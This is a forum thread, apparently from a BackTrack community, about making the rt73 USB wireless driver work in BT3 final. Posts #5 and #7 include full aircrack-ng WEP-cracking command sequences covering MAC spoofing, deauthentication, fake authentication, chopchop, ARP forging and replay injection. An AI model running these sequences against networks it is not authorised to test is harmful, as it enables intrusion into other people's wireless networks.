View Poll Results: Did this work for you?

Voters
33. You may not vote on this poll
  • Yes

    23 69.70%
  • No

    10 30.30%
Page 1 of 4 123 ... LastLast
Results 1 to 10 of 32

Thread: Getting the rt73 driver to work in BT3final

  1. #1
    Junior Member 0tt0v0nc4t's Avatar
    Join Date
    Mar 2008
    Posts
    69

    Default Getting the rt73 driver to work in BT3final

    BT3 final has a few minor issues with our driver that are fairly easy to circumvent and I wanted to share my solutions here. This is a collection of notes and ideas I have put together from my time here and first and foremost I want to thank the community because everything I'm putting here I found from various posts in these very forums.

    I would also like to ask you to please remember this is a howto for the RaLink RT73 USB Enhanced Driver. Please keep the discussion in this post relevant and don't ask for support for mundane BT3 tasks.

    Now lets begin. Its a good idea to grab a couple things before we get started. The first thing you need to do is get the BT3 kernel sources (thank you shamanvirtuel for delivering me from my noobedness)
    and after that you will need the previous version of the aspj driver. (SV yet again infinitely wise)

    After you have what you need and you are in BT you can bring down your current interface and driver with
    Code:
    ifconfig rausb0 down
    
    modprobe -r rt73
    Then you wanna navigate to your folder with the kernel.lzm and type
    Code:
    lzm2dir kernel.lzm /
    afterward you can go the the driver folder and
    Code:
    make
    
    make install
    now you can bring up the driver and interface with
    Code:
    modprobe rt73
    
    ifconfig rausb0 up
    At this point your wireless card is ready to be put to good use. Iwpriv commands and SpoonWep will now work gloriously! If you are looking to crack wep/wpa with our card use SpoonWep or look here for a tutorial on how do do it with the terminal, if you are looking to connect to a wep encrypted AP use wireless assistant, and if you are trying to connect to wpa/wpa2 use these commands.
    Code:
    ifconfig rausb0 up
    iwconfig rausb0 mode managed
    iwconfig rausb0 essid <Your SSID>
    iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2) *WPA2PSK is for this line only
    iwpriv rausb0 set WPAPSK=<Your Key>
    iwpriv rausb0 set EncrypType=TKIP (or AES)
    dhcpcd rausb0
    This has worked very well for me and I hope it works for you to. Good luck.

  2. #2
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    5

    Default

    Quote Originally Posted by 0tt0v0nc4t View Post
    When Bt3 loads it recognizes that the rt73 driver is loaded and sees the rausb0 interface but will not pick up ap's in any program. The fix I have found is to simply

    Code:
    modprobe -r rt73
    modprobe rt73
    Or even better... Use SpoonDrv.
    Please, can you explain what is SpoonDrv? is better?

  3. #3
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    I too have the Edimax EW-7318USg and just like the OP said, it doesn't work out of the box. I also had to modprobe the adapter for it to work.

    I doesn't bother me now, but out of curiosity can any of the dev's explain the reason why the card doesn't work for BT3 Final? It works on BT3beta out of the box.

  4. #4
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default Edimax EW-7318USg fails to inject

    My problem is that I can't get the Edimax EW-7318USg to inject with BT3. I had no problem with BT2 and have searched this forum but most of what I find suggests that it sould work out of the box or try:-

    iwpriv rausb0 rfmontx 1
    iwpriv rausb0 forceprism 1
    iwconfig rausb0 mode monitor

    Done this but when I try 'aireplay-ng -9 rausb0' against my AP it is a 100% failure, any suggestions would be appreciated.

  5. #5
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    Quote Originally Posted by speed999 View Post
    My problem is that I can't get the Edimax EW-7318USg to inject with BT3. I had no problem with BT2 and have searched this forum but most of what I find suggests that it sould work out of the box or try:-

    iwpriv rausb0 rfmontx 1
    iwpriv rausb0 forceprism 1
    iwconfig rausb0 mode monitor

    Done this but when I try 'aireplay-ng -9 rausb0' against my AP it is a 100% failure, any suggestions would be appreciated.
    Try this:

    Code:
    $ airmon-ng stop rausb0
    $ ifconfig rausb0 down
    $ macchanger --mac 00:11:22:33:44:55 rausb0
    $ airmon-ng start rausb0
    $ airodump-ng rausb0
    find the bssid
    copy the bssid
    $ airodump-ng -c 1 -w output --bssid <bssid> rausb0
    $ aireplay -1 0 -a paste -h 00:11:22:33:44:55 rausb0
    $ aireplay-ng -0 5 -a <bssid> rausb0
    $ aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0
    answer yes and wait
    $ packetforge-ng --arp -a <bssid> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y filename.xor -w arprequest
    $ aireplay-ng -2 -r arprequest rausb0
    say yes
    $ aircrack-ng output-01.cap

  6. #6
    Junior Member 0tt0v0nc4t's Avatar
    Join Date
    Mar 2008
    Posts
    69

    Default

    speed999, The aircrack wiki for our driver (found here ) Says to try
    Code:
    iwconfig rausb0 rate 1M
    good luck.

  7. #7
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default

    Quote Originally Posted by The_Denv View Post
    Try this:

    Code:
    $ airmon-ng stop rausb0
    $ ifconfig rausb0 down
    $ macchanger --mac 00:11:22:33:44:55 rausb0
    $ airmon-ng start rausb0
    $ airodump-ng rausb0
    find the bssid
    copy the bssid
    $ airodump-ng -c 1 -w output --bssid <bssid> rausb0
    $ aireplay -1 0 -a paste -h 00:11:22:33:44:55 rausb0
    $ aireplay-ng -0 5 -a <bssid> rausb0
    $ aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0
    answer yes and wait
    $ packetforge-ng --arp -a <bssid> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y filename.xor -w arprequest
    $ aireplay-ng -2 -r arprequest rausb0
    say yes
    $ aircrack-ng output-01.cap
    Tried this but 'aireplay-ng -1 0 -a <bssid> -h 00:11:22:33:44:55 rausb0' fails after 'Sending Authentication Request' with 'Attack was unsuccessful'. This is the same problem I have when using:-

    airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0

    aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0

    aircrack-ng -b <bssid> capturefile*.ivs

    I only get to attempting the fake authentication and it fails! No problem with the same attack using BT2.

    Tried ‘iwconfig rausb0 rate 1M’

    The fake authentication worked but 'aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0' failed 'the access point does not properly discard frames with an invalid ICV.....'

    When I used:-

    airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0

    aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0

    Brilliant and thanks it works!

    As the attack I have used works on BT2, I don’t think I would have made the link between the Aircrack wiki and BT3 without your help. My knowledge of Unix is almost zero so could I ask another question. The pps looks a bit slow compared with BT2 so if I try increasing the rate from 1M what do you recommend the increments should be?

    Thanks again for everyone’s help

  8. #8
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    Quote Originally Posted by speed999 View Post
    <snip>
    When I used:-

    airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0

    aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0

    Brilliant and thanks it works!

    As the attack I have used works on BT2, I don’t think I would have made the link between the Aircrack wiki and BT3 without your help. My knowledge of Unix is almost zero so could I ask another question. The pps looks a bit slow compared with BT2 so if I try increasing the rate from 1M what do you recommend the increments should be?

    Thanks again for everyone’s help
    Well I don't know what the increment should be, but if you increase it by 1dBi each time until it doesn't work; you will find your answer.

    Code:
    iwconfig rausb0 txpower 10
    Then increase it by 1dBi each time:
    Code:
    iwconfig rausb0 txpower 11
    Lucky for you anyway! All day I have been trying to inject my AP with my Edimax and I can't! LOL!
    It gets worse, Back|Track does recognize my card, but I tried a LOT of tricks and it was a hit and miss. It took me nearly 3 hours to connect to my AP as the card didn't see any AP's at all! Then when I set my card into monitor mode to test out the funny EzPWN toolset just for a laugh...it didn't see any APs!

    I exited EzPWN and loaded airodump-ng, it seen the APs. Then I stopped airodump-ng in order to define my AP in airodump and start injecting...nothing, it didn't even see any AP's. I can not connect to the internet on BackTrack unless I load it, restart it, load it and restart it again. Its very frustrating because it was working perfectly for a while and now I have to hold off my BASE/Snort/With_Graphs tutorial as Im in Windows as its the only way I can connect to my AP.

    Incase anyone is wondering, yes I do have a built in Atheros but I am not in my computer room today and the ath0 is crap from my shed. Any help from anyone on this mysterious rt73 problem would be appreciated.

    Okay, I am still in Windows [only way to surf at the moment] and I found this on the Aircrack-ng site:
    The instructions below reference an older version of the drivers then is available on ASPj's site. This is because the newer version contains some bugs. See the forum threads for details.
    I am going to look into this as soon as I boot back into BT3f

  9. #9
    Junior Member 0tt0v0nc4t's Avatar
    Join Date
    Mar 2008
    Posts
    69

    Default

    I am having strange issues with my card as well. Fortunately I have an intel pro wireless one a laptop so I have been using that to play around on.

    First, with my Edimax 7318 I can crack wep/wpa just fine in command line but I still have had absolutely zero success with SV's SpoonWep(works just fine on laptop with other card). SV had asked me to try installing the rt73-k2wrlz-2.0.1. driver but I have yet to try it.

    Second, No matter what I try, I cannot connect to my AP with WPA2 encryption.
    My previous working method for connecting with my card in BT is no longer working(see code below) and wireless assistant is fail.
    Code:
    ifconfig rausb0 up
    iwconfig rausb0 mode managed
    iwconfig rausb0 essid <Your SSID>
    iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2)
    iwpriv rausb0 set WPAPSK=<Your Key>
    iwpriv rausb0 set EncrypType=TKIP (or AES)
    dhcpcd rausb0
    My next step is to try the previous aspj driver,drop my encryption to wep, and see if I can connect/scan/exploit ok.

    Please post your solutions Denv and I will post any I find as well. Thanks.

  10. #10
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    Quote Originally Posted by 0tt0v0nc4t View Post
    I am having strange issues with my card as well. Fortunately I have an intel pro wireless one a laptop so I have been using that to play around on.

    First, with my Edimax 7318 I can crack wep/wpa just fine in command line but I still have had absolutely zero success with SV's SpoonWep(works just fine on laptop with other card). SV had asked me to try installing the rt73-k2wrlz-2.0.1. driver but I have yet to try it.

    Second, No matter what I try, I cannot connect to my AP with WPA2 encryption.
    My previous working method for connecting with my card in BT is no longer working(see code below) and wireless assistant is fail.
    Code:
    ifconfig rausb0 up
    iwconfig rausb0 mode managed
    iwconfig rausb0 essid <Your SSID>
    iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2)
    iwpriv rausb0 set WPAPSK=<Your Key>
    iwpriv rausb0 set EncrypType=TKIP (or AES)
    dhcpcd rausb0
    My next step is to try the previous aspj driver,drop my encryption to wep, and see if I can connect/scan/exploit ok.

    Please post your solutions Denv and I will post any I find as well. Thanks.
    I will do, no sweat man. Im on Windows at the moment using my Atheros card, it's nearly 5am and I have been awake for more or less 2 days trying to get BASE working. Not a problem, tomorrow I will troubleshoot my Edimax and post my results here. I also have zero success with Wireless Assistant and SpoonWep, of course CL was my first approach and it 'half' worked and hasn't worked since.

Page 1 of 4 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •